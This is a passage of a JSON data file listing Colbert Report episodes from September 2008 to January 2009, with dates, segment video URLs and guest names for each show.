        "http://thecolbertreport.cc.com/videos/awnw4i/susan-eisenhower-endorses-obama",
        "http://thecolbertreport.cc.com/videos/4cdiam/john-mccain--her-story",
        "http://thecolbertreport.cc.com/videos/x8u7qp/doris-kearns-goodwin",
        "http://thecolbertreport.cc.com/videos/rk1eeg/who-wants-beads-"
      ],
      "guest": "Doris Kearns Goodwin"
    },
    {
      "date": "2008-09-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/nvj1zq/intro---9-4-08",
        "http://thecolbertreport.cc.com/videos/1cwp12/stuck-in-atlanta-airport",
        "http://thecolbertreport.cc.com/videos/kyo8u3/adam-brickley",
        "http://thecolbertreport.cc.com/videos/c6ux4z/tip-wag---rnc-edition",
        "http://thecolbertreport.cc.com/videos/yywrwl/ron-paul",
        "http://thecolbertreport.cc.com/videos/kwoupb/flight-out-of-atlanta"
      ],
      "guest": "Adam Brickley, Ron Paul"
    },
    {
      "date": "2008-09-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/pg1oxm/intro---9-5-08",
        "http://thecolbertreport.cc.com/videos/2rjlbj/stephen-missed-the-convention",
        "http://thecolbertreport.cc.com/videos/njb4bu/green-screen-challenge---john-mccain-s-acceptance-speech",
        "http://thecolbertreport.cc.com/videos/zk7gig/better-know-a-district---georgia-s-8th---lynn-westmoreland-update",
        "http://thecolbertreport.cc.com/videos/xeizbt/david-paterson",
        "http://thecolbertreport.cc.com/videos/u3k61y/green-screen-challenge---go-nuts"
      ],
      "guest": "Gov. David Paterson"
    },
    {
      "date": "2008-09-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jshk87/exclusive---charlene--i-m-right-behind-you----rock-band-2",
        "http://thecolbertreport.cc.com/videos/jfwpwo/intro---9-15-08",
        "http://thecolbertreport.cc.com/videos/7yzozt/colbert-shopping-network",
        "http://thecolbertreport.cc.com/videos/f9h01l/the-word---how-dare-you-",
        "http://thecolbertreport.cc.com/videos/r0u91k/colbert-platinum---supermodel-statue",
        "http://thecolbertreport.cc.com/videos/ihx562/peter-j--gomes",
        "http://thecolbertreport.cc.com/videos/4ebszq/another-episode"
      ],
      "guest": "Rev. Peter J. Gomes"
    },
    {
      "date": "2008-09-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/urn1ti/intro---9-16-08",
        "http://thecolbertreport.cc.com/videos/k0bsca/financial-advice-from-gorlock",
        "http://thecolbertreport.cc.com/videos/mkpl4k/tyson-slocum",
        "http://thecolbertreport.cc.com/videos/75xh2f/threatdown---icebergs-",
        "http://thecolbertreport.cc.com/videos/3tm40j/rick-reilly",
        "http://thecolbertreport.cc.com/videos/vnf5o3/thirty-minutes"
      ],
      "guest": "Tyson Slocum, Rick Reilly"
    },
    {
      "date": "2008-09-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4l5nqm/intro---9-17-08",
        "http://thecolbertreport.cc.com/videos/y012iz/mccain-attacks-obama",
        "http://thecolbertreport.cc.com/videos/kyb0cu/the-word---powerless",
        "http://thecolbertreport.cc.com/videos/n6eo9j/country-first",
        "http://thecolbertreport.cc.com/videos/uwjjvf/bob-lutz",
        "http://thecolbertreport.cc.com/videos/3odd8c/stephen---the-colberts--music-video"
      ],
      "guest": "Bob Lutz"
    },
    {
      "date": "2008-09-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/crbm2j/intro---9-18-08",
        "http://thecolbertreport.cc.com/videos/1jklj8/stephen-wants-an-emmy",
        "http://thecolbertreport.cc.com/videos/j1rb59/smokin--pole---american-arctic-expert",
        "http://thecolbertreport.cc.com/videos/jgr23t/richard-garriott-takes-stephen-to-space",
        "http://thecolbertreport.cc.com/videos/r2z9cm/maria-bartiromo",
        "http://thecolbertreport.cc.com/videos/f0iah5/off-to-the-emmys"
      ],
      "guest": "Maria Bartiromo"
    },
    {
      "date": "2008-09-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/s3o9jz/intro---9-23-08",
        "http://thecolbertreport.cc.com/videos/ikji5j/stephen-loses-to-don-rickles",
        "http://thecolbertreport.cc.com/videos/vj8wko/the-word---ohmygodsocietyiscollapsing---",
        "http://thecolbertreport.cc.com/videos/bna75w/peter-grosz-insults",
        "http://thecolbertreport.cc.com/videos/iscpss/john-mccain-s-theme-song",
        "http://thecolbertreport.cc.com/videos/8uwmb0/jackson-browne"
      ],
      "guest": "Jackson Browne"
    },
    {
      "date": "2008-09-24",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5k16zp/intro---9-24-08",
        "http://thecolbertreport.cc.com/videos/zxun4o/stephen-suspends-the-show",
        "http://thecolbertreport.cc.com/videos/y03i0s/joe-nocera",
        "http://thecolbertreport.cc.com/videos/ug1eaa/alpha-dog-of-the-week---bill-bennett",
        "http://thecolbertreport.cc.com/videos/m77ip1/cornel-west",
        "http://thecolbertreport.cc.com/videos/5lq5u2/colbertnation-com"
      ],
      "guest": "Joe Nocera, Cornel West"
    },
    {
      "date": "2008-09-25",
      "videos": [
        "http://thecolbertreport.cc.com/videos/c2lklm/intro---9-25-08",
        "http://thecolbertreport.cc.com/videos/n6lmpg/stephen-settles-the-debate---fdr-vs--tr",
        "http://thecolbertreport.cc.com/videos/k6o1ga/now-s-presidential-endorsement---kim-gandy",
        "http://thecolbertreport.cc.com/videos/bqde8h/nicholas-carr",
        "http://thecolbertreport.cc.com/videos/c44c8h/one-more-thing"
      ],
      "guest": "Nicholas Carr"
    },
    {
      "date": "2008-09-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/1c54hn/intro---9-29-08",
        "http://thecolbertreport.cc.com/videos/05f4cg/the-first-debate-winner",
        "http://thecolbertreport.cc.com/videos/bweuwc/the-word---ye-of-little-faith",
        "http://thecolbertreport.cc.com/videos/cgij7r/cheating-death---car-bacteria",
        "http://thecolbertreport.cc.com/videos/vp621m/paul-begala",
        "http://thecolbertreport.cc.com/videos/gpa8yw/good-night"
      ],
      "guest": "Paul Begala"
    },
    {
      "date": "2008-09-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y8hkhe/intro---9-30-08",
        "http://thecolbertreport.cc.com/videos/9st6mt/partisanship-kills-the-bailout",
        "http://thecolbertreport.cc.com/videos/f9oh9q/prescott-oil-loves-the-earth",
        "http://thecolbertreport.cc.com/videos/d0zdru/tip-wag---wall-street-jagoffs",
        "http://thecolbertreport.cc.com/videos/j67wur/out-of-time"
      ],
      "guest": "James Taylor"
    },
    {
      "date": "2008-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/t7tnvd/exclusive---nas-plays-rock-band",
        "http://thecolbertreport.cc.com/videos/y8hkhe/intro---9-30-08",
        "http://thecolbertreport.cc.com/videos/9st6mt/partisanship-kills-the-bailout",
        "http://thecolbertreport.cc.com/videos/f9oh9q/prescott-oil-loves-the-earth",
        "http://thecolbertreport.cc.com/videos/d0zdru/tip-wag---wall-street-jagoffs",
        "http://thecolbertreport.cc.com/videos/j67wur/out-of-time"
      ],
      "guest": "Dave Levin"
    },
    {
      "date": "2008-10-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/eqbu4l/intro---10-01-08",
        "http://thecolbertreport.cc.com/videos/ovyu4c/campbell-s-soup-stock",
        "http://thecolbertreport.cc.com/videos/bhfa94/the-word---future-perfect",
        "http://thecolbertreport.cc.com/videos/86s1x0/colbert-teen-talk---voter-abstinence",
        "http://thecolbertreport.cc.com/videos/1v6olb/dave-levin",
        "http://thecolbertreport.cc.com/videos/e5ngk1/you-snooze--you-lose"
      ],
      "guest": "Dave Levin"
    },
    {
      "date": "2008-10-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zc7pti/intro---10-02-08",
        "http://thecolbertreport.cc.com/videos/jwi5c6/stephen-shoots-an-audience-member",
        "http://thecolbertreport.cc.com/videos/nkfn9g/shakespearean-candidates---stephen-greenblatt",
        "http://thecolbertreport.cc.com/videos/9cm5sl/formidable-opponent---business-syphilis",
        "http://thecolbertreport.cc.com/videos/kvfh5w/naomi-klein",
        "http://thecolbertreport.cc.com/videos/xsttzx/that-s-all-she-wrote"
      ],
      "guest": "Stephen Greenblatt, Naomi Klein"
    },
    {
      "date": "2008-10-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/xxiviw/intro---10-6-08",
        "http://thecolbertreport.cc.com/videos/1hb3kb/oj-simpson-guilty",
        "http://thecolbertreport.cc.com/videos/qlbk95/the-word---maverick-without-a-cause",
        "http://thecolbertreport.cc.com/videos/qnwvgs/un-american-news---financial-edition",
        "http://thecolbertreport.cc.com/videos/tn9q1r/jim-cramer",
        "http://thecolbertreport.cc.com/videos/gpjjik/life-drawing-lesson"
      ],
      "guest": "Jim Cramer"
    },
    {
      "date": "2008-10-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/lr7n1e/intro---10-7-08",
        "http://thecolbertreport.cc.com/videos/ehcjcu/stephen-s-town-hall",
        "http://thecolbertreport.cc.com/videos/yulr8u/threatdown---zombies",
        "http://thecolbertreport.cc.com/videos/e56sfz/the-red-lending-menace",
        "http://thecolbertreport.cc.com/videos/xoy3ny/nate-silver",
        "http://thecolbertreport.cc.com/videos/0t800l/phone-book"
      ],
      "guest": "Nate Silver"
    },
    {
      "date": "2008-10-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wnllod/intro---10-08-08",
        "http://thecolbertreport.cc.com/videos/rb63v8/town-hall-fashion-apology",
        "http://thecolbertreport.cc.com/videos/pmvhoi/the-second-presidential-debate",
        "http://thecolbertreport.cc.com/videos/r8hb9t/atone-phone---gilbert-gottfried",
        "http://thecolbertreport.cc.com/videos/7943ea/joe-scarborough",
        "http://thecolbertreport.cc.com/videos/02dsh7/stephen-s-post-show-routine"
      ],
      "guest": "Joe Scarborough"
    },
    {
      "date": "2008-10-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cbxmlr/intro---10-09-08",
        "http://thecolbertreport.cc.com/videos/l3uq93/dismayed-stockbroker-photos",
        "http://thecolbertreport.cc.com/videos/pqsng6/campaign-personal-attacks---david-gergen",
        "http://thecolbertreport.cc.com/videos/f6283x/who-s-not-honoring-me-now----nepal",
        "http://thecolbertreport.cc.com/videos/ge3feb/oliver-stone",
        "http://thecolbertreport.cc.com/videos/w87c40/bad-news"
      ],
      "guest": "David Gergen, Oliver Stone"
    },
    {
      "date": "2008-10-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/5c0f2m/intro---10-13-08",
        "http://thecolbertreport.cc.com/videos/fnytnd/mccain-crossword-clue",
        "http://thecolbertreport.cc.com/videos/1jl5yn/the-computer-menace---bethany-mclean",
        "http://thecolbertreport.cc.com/videos/1goeih/bears---balls---salt-based-economy",
        "http://thecolbertreport.cc.com/videos/gyyaxy/kathleen-parker",
        "http://thecolbertreport.cc.com/videos/6y4q65/happy-birthday"
      ],
      "guest": "Bethany McLean, Kathleen Parker"
    },
    {
      "date": "2008-10-14",
      "videos": [
        "http://thecolbertreport.cc.com/videos/n5hrc3/intro---10-14-08",
        "http://thecolbertreport.cc.com/videos/7pd7zc/paul-krugman-s-nobel-prize",
        "http://thecolbertreport.cc.com/videos/r0q5ve/the-word---p-o-w-",
        "http://thecolbertreport.cc.com/videos/pfbd0x/tip-wag---palin-s-newsweek-cover",
        "http://thecolbertreport.cc.com/videos/usq8wp/joseph-stiglitz",
        "http://thecolbertreport.cc.com/videos/lvn4rk/good-night"
      ],
      "guest": "Joseph Stiglitz"
    },
    {
      "date": "2008-10-15",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zwbmit/intro---10-15-08",
        "http://thecolbertreport.cc.com/videos/9308mk/kfc-snacker",
        "http://thecolbertreport.cc.com/videos/l7yb6p/the-word---freaky-three-way-calling",
        "http://thecolbertreport.cc.com/videos/4e7lhp/sport-report---lame-sports-edition",
        "http://thecolbertreport.cc.com/videos/38m5c1/tina-brown",
        "http://thecolbertreport.cc.com/videos/8g4g6k/chest-tivo"
      ],
      "guest": "Tina Brown"
    },
    {
      "date": "2008-10-16",
      "videos": [
        "http://thecolbertreport.cc.com/videos/wiiett/intro---10-16-08",
        "http://thecolbertreport.cc.com/videos/clx1g3/the-final-debate",
        "http://thecolbertreport.cc.com/videos/irar1b/portrait-accepted---brent-glass",
        "http://thecolbertreport.cc.com/videos/vhpq80/robert-greenwald",
        "http://thecolbertreport.cc.com/videos/dtl1jb/a-new-portrait"
      ],
      "guest": "Brent Glass, Robert Greenwald"
    },
    {
      "date": "2008-10-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/icr62o/intro---10-20-08",
        "http://thecolbertreport.cc.com/videos/hztig3/colin-powell-endorses-barack-obama",
        "http://thecolbertreport.cc.com/videos/m2bwgq/fareed-zakaria",
        "http://thecolbertreport.cc.com/videos/f1sjmz/colbert-aluminum---paris",
        "http://thecolbertreport.cc.com/videos/ihme7b/wynton-marsalis",
        "http://thecolbertreport.cc.com/videos/1zx8mm/good-night"
      ],
      "guest": "Fareed Zakaria, Wynton Marsalis"
    },
    {
      "date": "2008-10-21",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ipzwmk/intro---10-21-08",
        "http://thecolbertreport.cc.com/videos/1q0lgd/stephen-jr--campaigns-for-mccain",
        "http://thecolbertreport.cc.com/videos/6mt8jf/the-word---fantasyland",
        "http://thecolbertreport.cc.com/videos/yf6nbq/battle-of-the-gods",
        "http://thecolbertreport.cc.com/videos/ajdj8y/atone-phone---the-pony-down",
        "http://thecolbertreport.cc.com/videos/2f3tuj/michael-farris",
        "http://thecolbertreport.cc.com/videos/gsnyc0/another-one-tomorrow"
      ],
      "guest": "Michael Farris"
    },
    {
      "date": "2008-10-22",
      "videos": [
        "http://thecolbertreport.cc.com/videos/zfo3j9/intro---10-22-08",
        "http://thecolbertreport.cc.com/videos/bnfehb/mccain-loves-the-middle-class",
        "http://thecolbertreport.cc.com/videos/2fhvot/too-much-political-knowledge",
        "http://thecolbertreport.cc.com/videos/l9sa9k/movies-that-are-destroying-america---quantum-of-solace",
        "http://thecolbertreport.cc.com/videos/bfif72/david-frum",
        "http://thecolbertreport.cc.com/videos/zijniy/thanks-to-cedric-the-entertainer"
      ],
      "guest": "David Frum"
    },
    {
      "date": "2008-10-23",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4fsdf9/intro---10-23-08",
        "http://thecolbertreport.cc.com/videos/mxdemq/the-palins-in-people-magazine",
        "http://thecolbertreport.cc.com/videos/9r8mtw/threatdown---who-s-nailin--paylin",
        "http://thecolbertreport.cc.com/videos/d9d59e/difference-makers---the-national-hummer-club",
        "http://thecolbertreport.cc.com/videos/vu40sp/jonathan-alter",
        "http://thecolbertreport.cc.com/videos/4q4n65/a-short-goodbye"
      ],
      "guest": "Jonathan Alter"
    },
    {
      "date": "2008-10-27",
      "videos": [
        "http://thecolbertreport.cc.com/videos/59kvnn/intro---10-27-08",
        "http://thecolbertreport.cc.com/videos/o5x5iu/mccain-guarantees-victory",
        "http://thecolbertreport.cc.com/videos/05r6nq/the-word---it-s-alive-",
        "http://thecolbertreport.cc.com/videos/7g8kx1/alpha-dog-of-the-week---mark-ciptak",
        "http://thecolbertreport.cc.com/videos/fnuvdv/yo-yo-ma"
      ],
      "guest": "Yo-Yo Ma"
    },
    {
      "date": "2008-10-28",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ghj64m/intro---10-28-08",
        "http://thecolbertreport.cc.com/videos/xk09yu/ted-stevens-is-found-guilty",
        "http://thecolbertreport.cc.com/videos/7j217q/obama-the-socialist",
        "http://thecolbertreport.cc.com/videos/bxzmkn/socialist-candidate-for-president---brian-moore",
        "http://thecolbertreport.cc.com/videos/wz2u1e/canton--ohio",
        "http://thecolbertreport.cc.com/videos/ytg04i/sherman-alexie",
        "http://thecolbertreport.cc.com/videos/jz4m1g/tickets-to-canada"
      ],
      "guest": "Brian Moore, Sherman Alexie"
    },
    {
      "date": "2008-10-29",
      "videos": [
        "http://thecolbertreport.cc.com/videos/ix1wn7/intro---10-29-08",
        "http://thecolbertreport.cc.com/videos/ks5pt8/john-mccain-s-big-prank",
        "http://thecolbertreport.cc.com/videos/7qwbk4/the-word---i-endorse-barack-obama",
        "http://thecolbertreport.cc.com/videos/k5qv33/was-it-really-that-bad----the-great-depression",
        "http://thecolbertreport.cc.com/videos/cxwcsb/david-simon",
        "http://thecolbertreport.cc.com/videos/prhqai/colbert-completists"
      ],
      "guest": "David Simon"
    },
    {
      "date": "2008-10-30",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9sqk1r/intro---10-30-08",
        "http://thecolbertreport.cc.com/videos/b7m8ic/obama-infomercial",
        "http://thecolbertreport.cc.com/videos/7mbhhk/tip-wag---apple-computers",
        "http://thecolbertreport.cc.com/videos/tiopht/the-dacolbert-code---the-election",
        "http://thecolbertreport.cc.com/videos/ugfx1s/wilco-interview"
      ],
      "guest": "Wilco"
    },
    {
      "date": "2008-11-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/gc439u/intro---11-03-08",
        "http://thecolbertreport.cc.com/videos/jtvn9v/2008-campaign-winners-and-losers",
        "http://thecolbertreport.cc.com/videos/q31c3b/charlie-cook",
        "http://thecolbertreport.cc.com/videos/syw57q/how-to-be-a-maverick",
        "http://thecolbertreport.cc.com/videos/3lix4b/andrew-sullivan",
        "http://thecolbertreport.cc.com/videos/5snsio/election-eve-prayer"
      ],
      "guest": "Charlie Cook, Andrew Sullivan"
    },
    {
      "date": "2008-11-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/deihkn/intro---11-05-08",
        "http://thecolbertreport.cc.com/videos/ek3v6r/president-obama",
        "http://thecolbertreport.cc.com/videos/p698of/the-word---change",
        "http://thecolbertreport.cc.com/videos/b3gurg/threatdown---black-presidents",
        "http://thecolbertreport.cc.com/videos/1bpyxl/andrew-young",
        "http://thecolbertreport.cc.com/videos/wmwkia/note-to-gorlock"
      ],
      "guest": "Ambassador Andrew Young"
    },
    {
      "date": "2008-11-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jvmllx/intro---11-06-08",
        "http://thecolbertreport.cc.com/videos/8cjwkf/obama-s-spider-battle",
        "http://thecolbertreport.cc.com/videos/91wunt/un-american-news---obama-edition",
        "http://thecolbertreport.cc.com/videos/aedolr/fallback-position---peter-earnest-pt--1",
        "http://thecolbertreport.cc.com/videos/tp44lf/rachel-maddow"
      ],
      "guest": "Rachel Maddow"
    },
    {
      "date": "2008-11-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/3vbqce/intro---11-11-08",
        "http://thecolbertreport.cc.com/videos/t0o0ln/the-obamas-meet-the-bushes",
        "http://thecolbertreport.cc.com/videos/cf9i7o/proposition-8-protests---dan-savage",
        "http://thecolbertreport.cc.com/videos/a4htau/fallback-position---peter-earnest-pt--2",
        "http://thecolbertreport.cc.com/videos/97cxi9/kevin-johnson",
        "http://thecolbertreport.cc.com/videos/knwq1k/gay-black-violence"
      ],
      "guest": "Dan Savage, Kevin Johnson"
    },
    {
      "date": "2008-11-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/jxnavl/intro---11-12-08",
        "http://thecolbertreport.cc.com/videos/hs06sa/formula-4ou1",
        "http://thecolbertreport.cc.com/videos/jdc5wl/the-word---pity-party",
        "http://thecolbertreport.cc.com/videos/vq5z69/cheating-death---women-s-health",
        "http://thecolbertreport.cc.com/videos/h8pdku/bob-woodward",
        "http://thecolbertreport.cc.com/videos/yj3fvl/good-night"
      ],
      "guest": "Bob Woodward"
    },
    {
      "date": "2008-11-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/iy78xf/intro---11-13-08",
        "http://thecolbertreport.cc.com/videos/ws4itq/imaginary-gay-black-warfare",
        "http://thecolbertreport.cc.com/videos/54gy81/tip-wag---marvel-comics",
        "http://thecolbertreport.cc.com/videos/9so57k/rahm-emanuel-s-finger",
        "http://thecolbertreport.cc.com/videos/84locu/stephen-moore",
        "http://thecolbertreport.cc.com/videos/kwiam8/obama-spider-man-comic-bribe"
      ],
      "guest": "Stephen Moore"
    },
    {
      "date": "2008-11-17",
      "videos": [
        "http://thecolbertreport.cc.com/videos/edyiaw/intro---11-17-08",
        "http://thecolbertreport.cc.com/videos/vfh1d7/stephen-s-gma-appearance",
        "http://thecolbertreport.cc.com/videos/tyr5yf/barack-obama-is-hiring",
        "http://thecolbertreport.cc.com/videos/xubttj/obama-s-cabinet---tom-brokaw",
        "http://thecolbertreport.cc.com/videos/okezd5/soup-war",
        "http://thecolbertreport.cc.com/videos/lu8hmu/malcolm-gladwell",
        "http://thecolbertreport.cc.com/videos/f67l6s/stephen-drinks-soup"
      ],
      "guest": "Tom Brokaw, Malcolm Gladwell"
    },
    {
      "date": "2008-11-18",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cpar3w/intro---11-18-08",
        "http://thecolbertreport.cc.com/videos/gpyfhe/joe-lieberman-learns-his-fate",
        "http://thecolbertreport.cc.com/videos/tda4m3/the-word---love-lost",
        "http://thecolbertreport.cc.com/videos/rfqomg/stephen-s-vetting-process---cliff-sloan-pt--1"
      ],
      "guest": "Paul Simon"
    },
    {
      "date": "2008-11-19",
      "videos": [
        "http://thecolbertreport.cc.com/videos/a4gbi9/intro---11-19-08",
        "http://thecolbertreport.cc.com/videos/3ebcnc/the-word---mad-men",
        "http://thecolbertreport.cc.com/videos/hjm6c3/stephen-s-vetting-process---cliff-sloan-pt--2",
        "http://thecolbertreport.cc.com/videos/p1vjk5/michael-lewis",
        "http://thecolbertreport.cc.com/videos/5n2dbq/tearful-apology"
      ],
      "guest": "Michael Lewis"
    },
    {
      "date": "2008-11-20",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cbvik4/intro---11-20-08",
        "http://thecolbertreport.cc.com/videos/ag7dg1/racism-is-over---cory-booker",
        "http://thecolbertreport.cc.com/videos/2frm4q/metunes---chinese-democracy",
        "http://thecolbertreport.cc.com/videos/c48nk9/thomas-friedman",
        "http://thecolbertreport.cc.com/videos/bd8wju/christmas-special-dvd-warning"
      ],
      "guest": "Cory Booker, Thomas L. Friedman"
    },
    {
      "date": "2008-12-01",
      "videos": [
        "http://thecolbertreport.cc.com/videos/rpma6e/intro---12-01-08",
        "http://thecolbertreport.cc.com/videos/tq2nxp/operation-humble-kanye",
        "http://thecolbertreport.cc.com/videos/qarmhd/war-in-afghanistan",
        "http://thecolbertreport.cc.com/videos/rven6i/khaled-hosseini",
        "http://thecolbertreport.cc.com/videos/36dgrv/tip-wag---all-wag-christmas-edition",
        "http://thecolbertreport.cc.com/videos/7058uf/roland-fryer",
        "http://thecolbertreport.cc.com/videos/n1in3i/good-night"
      ],
      "guest": "Khaled Hosseini, Roland Fryer"
    },
    {
      "date": "2008-12-02",
      "videos": [
        "http://thecolbertreport.cc.com/videos/cj7hhg/intro---12-02-08",
        "http://thecolbertreport.cc.com/videos/qvwoip/operation-humble-kanye---buy-stephen-s-album",
        "http://thecolbertreport.cc.com/videos/ztjt9g/the-word---a-man-named-plaxico",
        "http://thecolbertreport.cc.com/videos/fic3d1/colbert-platinum---christmas-edition",
        "http://thecolbertreport.cc.com/videos/bshkcz/jeffrey-goldberg",
        "http://thecolbertreport.cc.com/videos/utntlq/buy-stephen-s-boots-on-ebay"
      ],
      "guest": "Jeffrey Goldberg"
    },
    {
      "date": "2008-12-03",
      "videos": [
        "http://thecolbertreport.cc.com/videos/il4wbl/intro---12-03-08",
        "http://thecolbertreport.cc.com/videos/owefww/nasa-spider-escapes",
        "http://thecolbertreport.cc.com/videos/z33t4w/the-word---barack-handed-compliment",
        "http://thecolbertreport.cc.com/videos/mcfi82/nailed--em---radical-knitting",
        "http://thecolbertreport.cc.com/videos/2karre/barbara-walters",
        "http://thecolbertreport.cc.com/videos/r6ufyo/the-end--not-the-beginning"
      ],
      "guest": "Barbara Walters"
    },
    {
      "date": "2008-12-04",
      "videos": [
        "http://thecolbertreport.cc.com/videos/d118oe/intro---12-04-08",
        "http://thecolbertreport.cc.com/videos/2fjry6/operation-humble-kanye---stephen-beats-kanye",
        "http://thecolbertreport.cc.com/videos/2d2zn0/pakistani-threat---bob-graham",
        "http://thecolbertreport.cc.com/videos/d5jif7/movies-that-are-destroying-america---holiday-movie-edition",
        "http://thecolbertreport.cc.com/videos/n7jvhg/nicholas-wade",
        "http://thecolbertreport.cc.com/videos/sugr09/returning-monday"
      ],
      "guest": "Sen. Bob Graham, Nicholas Wade"
    },
    {
      "date": "2008-12-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/7u2bhk/intro---12-08-08",
        "http://thecolbertreport.cc.com/videos/ao9vg7/bush-kisses-streisand",
        "http://thecolbertreport.cc.com/videos/gctknh/the-word---season-of-giving",
        "http://thecolbertreport.cc.com/videos/6153k5/barry---the-stump",
        "http://thecolbertreport.cc.com/videos/hpitea/geoffrey-canada",
        "http://thecolbertreport.cc.com/videos/0r2h5l/stephen-on-conan"
      ],
      "guest": "Geoffrey Canada"
    },
    {
      "date": "2008-12-09",
      "videos": [
        "http://thecolbertreport.cc.com/videos/4g9cia/intro---12-09-08",
        "http://thecolbertreport.cc.com/videos/onbk9a/rod-blagojevich-is-arrested",
        "http://thecolbertreport.cc.com/videos/600m6s/nixmas-tree-trimming---kevin-bacon",
        "http://thecolbertreport.cc.com/videos/yflimf/tek-jansen---beginning-s-first-dawn--episode-two-revisited",
        "http://thecolbertreport.cc.com/videos/srrck8/charlie-kaufman",
        "http://thecolbertreport.cc.com/videos/zkndmq/nixon-angel"
      ],
      "guest": "Kevin Bacon, Charlie Kaufman"
    },
    {
      "date": "2008-12-10",
      "videos": [
        "http://thecolbertreport.cc.com/videos/u8ghsg/intro---12-10-08",
        "http://thecolbertreport.cc.com/videos/f9io4y/rod-blagojevich-s-birthday",
        "http://thecolbertreport.cc.com/videos/imth2d/threatdown---happiness",
        "http://thecolbertreport.cc.com/videos/jnn2lb/on-notice---forgiveness",
        "http://thecolbertreport.cc.com/videos/i1wzcc/richard-haass",
        "http://thecolbertreport.cc.com/videos/uw87dl/good-night"
      ],
      "guest": "Richard Haass"
    },
    {
      "date": "2008-12-11",
      "videos": [
        "http://thecolbertreport.cc.com/videos/y3mqae/intro---12-11-08",
        "http://thecolbertreport.cc.com/videos/djirpd/michael-phelps",
        "http://thecolbertreport.cc.com/videos/j11gba/stephen-eats-ghost-ribs",
        "http://thecolbertreport.cc.com/videos/zc9rq9/the-ghost-of-stage-manager-bobby",
        "http://thecolbertreport.cc.com/videos/1756ia/the-word---the-unbearable-lightness-of-supreme-being"
      ],
      "guest": "Michael Phelps"
    }
  ],
  "2009": [
    {
      "date": "2009-01-05",
      "videos": [
        "http://thecolbertreport.cc.com/videos/9k2tbm/intro---1-05-09",
        "http://thecolbertreport.cc.com/videos/za98w3/colbert-and-colmes---roland-burris-appointment",
        "http://thecolbertreport.cc.com/videos/hq4p9o/tek-jansen---beginning-s-first-dawn--episode-three",
        "http://thecolbertreport.cc.com/videos/nrlhy0/john-king",
        "http://thecolbertreport.cc.com/videos/5hoaoz/colbert-and-colmes---colmes-gets-fired"
      ],
      "guest": "Riley Crane"
    },
    {
      "date": "2009-01-06",
      "videos": [
        "http://thecolbertreport.cc.com/videos/sn2rhf/ponzi-schemes",
        "http://thecolbertreport.cc.com/videos/k6j6as/hiding-gold---david-leonhardt",
        "http://thecolbertreport.cc.com/videos/4zhwch/better-know-a-district---utah-s-3rd---jason-chaffetz",
        "http://thecolbertreport.cc.com/videos/g9ppzt/matt-miller",
        "http://thecolbertreport.cc.com/videos/yys5yk/thank-you--stephen"
      ],
      "guest": "Capt. Charles Moore"
    },
    {
      "date": "2009-01-07",
      "videos": [
        "http://thecolbertreport.cc.com/videos/z8rm3b/intro---01-07-09",
        "http://thecolbertreport.cc.com/videos/92yx1q/che-stadium",
        "http://thecolbertreport.cc.com/videos/d1e1eu/dr--gupta-s-penis-pyramid",
        "http://thecolbertreport.cc.com/videos/nqulkz/the-word---statute-of-liberty",
        "http://thecolbertreport.cc.com/videos/amgd80/tip-wag---cocaine-honey",
        "http://thecolbertreport.cc.com/videos/yau33c/benicio-del-toro"
      ],
      "guest": "James Fowler"
    },
    {
      "date": "2009-01-08",
      "videos": [
        "http://thecolbertreport.cc.com/videos/88kvmz/intro---01-08-09",
        "http://thecolbertreport.cc.com/videos/wcgnr1/new-york-times-abandons-dignity",
        "http://thecolbertreport.cc.com/videos/926dzf/yahweh-or-no-way---roland-burris",
        "http://thecolbertreport.cc.com/videos/fk4a9c/leg-wrestling-rematch",
        "http://thecolbertreport.cc.com/videos/gteixg/a-really-good-book",
        "http://thecolbertreport.cc.com/videos/6428p8/pro-commie-epic"
      ],
      "guest": "Lawrence Lessig"
    },
    {
      "date": "2009-01-12",
      "videos": [
        "http://thecolbertreport.cc.com/videos/kni4vi/intro---01-12-09",
        "http://thecolbertreport.cc.com/videos/9c4f03/bush-s-last-press-conference",
        "http://thecolbertreport.cc.com/videos/bwmns5/the-word---sweet-smell-of-success",
        "http://thecolbertreport.cc.com/videos/0o1xwh/stephen-jr--on-christmas-eve",
        "http://thecolbertreport.cc.com/videos/dkx1ya/anthony-romero",
        "http://thecolbertreport.cc.com/videos/by8gkb/a-lot-more-to-say"
      ],
      "guest": "Anthony Romero"
    },
    {
      "date": "2009-01-13",
      "videos": [
        "http://thecolbertreport.cc.com/videos/32ytiz/intro---01-13-09",
        "http://thecolbertreport.cc.com/videos/fmzudp/bush-presidency-aged-us",
        "http://thecolbertreport.cc.com/videos/9et79a/cold-war-update---cuba",
        "http://thecolbertreport.cc.com/videos/m3x3ok/on-notice---limey-squirrel-eaters",
        "http://thecolbertreport.cc.com/videos/k1og3a/niall-ferguson",
        "http://thecolbertreport.cc.com/videos/5px40o/that-s-all-the-time-we-have"
      ],
      "guest": "Niall Ferguson"
    },
    {
      "date": "2009-01-14",
